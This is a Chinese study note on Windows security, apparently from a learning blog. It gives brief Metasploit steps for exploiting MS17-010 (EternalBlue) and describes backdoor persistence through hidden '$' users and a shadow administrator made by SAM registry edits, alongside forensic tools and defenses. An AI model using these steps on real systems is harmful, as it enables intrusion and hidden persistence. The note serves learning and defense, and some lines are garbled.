中华人民共和国网络安全法
任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络完全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具,明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
免责声明:本笔记仅用于学习网络安全 ,所有实操都在靶场进行,因用于其他用途间接或直接造成后果的均由本人承担,作者不因此承担任何责任,请遵循中华人民共和国网络安全法合法上网。
一、操作系统
1、定义:管理计算机硬件与软件资源的基础系统软件,其他软件需依托其运行
2、主流分类
- Windows:微软研发,应用最广泛,分个人版与服务器版。
- Linux:开源类 Unix 系统,1991 年发布。
- macOS:苹果专属操作系统
3、Windows 版本
- 个人版:Windows 7/10/11
- 服务器版:Windows Server 2003/2008/2012/2019/2022
4、核心安全风险:系统自身 / 服务漏洞、第三方应用程序漏洞
二、windows系统服务安全
1、经典漏洞::MS17-010(永恒之蓝)
- 原理:利用 SMB 协议(445 端口)漏洞,可远程执行任意代码,获取系统最高权限。
- 攻击环境:攻击机 Kali、受害机 Windows 7。
- 攻击流程:
验证漏洞存在性,可使用Nmap脚本检测目标是否存在该漏洞
若输出现实VULNERABLE,则目标存在漏洞,可进行后续攻击
① 启动 msfconsole
msfconsole② 搜索 ms17-010 模块,选择攻击模板并加载
search ms17_010use exploit/windows/smb/ms17_010_eternalblue③ 设置目标IP(set rhost 目标ip)
④ 执行攻击
exploit2、用户权限与管理
Windows是多用户操作系统,用户组是一系列用户的集合,组内的用户自动具备该组所设置的权限。
windows用户:
system:本地机器上拥有最高权限的用户
(为系统核心组件访问文件资源提供权限)
Administrator:默认系统管理员用户
Standard User:标准用户
guest:来宾用户
windows文件权限:
完全控制、修改、读取和运行、列出文件夹目录、读取、写入。
用户管理命令:
#查看用户net user
#创建普通用户net user 用户名 密码 /add
#修改用户密码net user 用户名 新密码
#删除用户账户net user 用户名 /delete
#将用户添加到特定组net localgroup 组名 用户名 /add
3、系统后门类型
- 隐藏用户:用户名加
$,命令行不可见,如net user gaga$ 123456 /add。 - 影子用户:通过注册表
HKEY_LOCAL_MACHINE\SAM\SAM修改权限、导出导入配置,伪装成管理员权限用户。
4、系统排查工具
- 端口扫描:
nmap、Goby(速度快,适合漏洞扫描)。 - 进程查看:任务管理器、
tasklist。 - 网络连接:
netstat -ano(查端口、外联 IP)。 - 启动项 / 计划任务 / 服务:
net start、任务计划程序。 - 日志分析:事件查看器(系统 / 安全 / 应用日志)。
- 深度排查:PCHunter、userassistview(程序执行记录)。
Windows Defenderefender DefenderDefender
病毒与威胁防护(核心功能)
实时保护:扫描恶意软件,基于云AI和签名库检测威胁。
离线扫描:应对顽固病毒,可在系统启动前清除感染。
行为监控:检测异常进程。
防火墙与网络保护
双向防火墙:管理入站/出站流量规则,阻止未授权访问。
网络隔离:标记不安全网络,自动启用严格防护
三、Windows 第三方应用安全
1、常见软件漏洞
- 微信 Windows 版:远程代码执行(RCE)漏洞。
- WPS:恶意文档触发远程代码执行。
- 向日葵远程控制:旧版本(≤11.0.0.33)存在漏洞,端口 40000-65535,可获取 System 权限。
2、攻击者常用流程
制作木马 → 植入 → 启动 → 控制靶机。
四、Windows 安全防御
- 系统服务防护:及时更新、安装系统补丁。
- 第三方软件防护:保持最新版本、定期排查、开启系统防护、提高安全意识。
- 系统自带防护
- Windows Defender:实时保护、离线扫描、行为监控。
- 防火墙:双向流量管控、网络隔离。
若文中有错误欢迎读者朋友能够不吝赐教进行指正!
功能介绍)
)
